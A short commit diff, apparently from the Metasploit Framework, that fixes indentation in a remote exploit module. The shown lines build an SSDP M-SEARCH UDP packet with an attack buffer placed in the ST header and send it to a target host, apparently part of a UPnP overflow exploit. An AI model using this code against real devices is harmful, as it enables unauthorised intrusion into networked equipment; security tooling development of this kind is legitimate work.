Fix idents from copypasta

unstable
HD Moore 2013-02-03 17:48:13 -06:00
parent 975230c9e7
commit 94953d0450
1 changed files with 3 additions and 3 deletions

View File

@ -94,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3)
"Man:\"ssdp:discover\"\r\n" +
"MX:3\r\n\r\n"
"ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3)
"Man:\"ssdp:discover\"\r\n" +
"MX:3\r\n"
print_status("Sending #{pkt.length} bytes to #{rhost}:#{rport}...")
connect_udp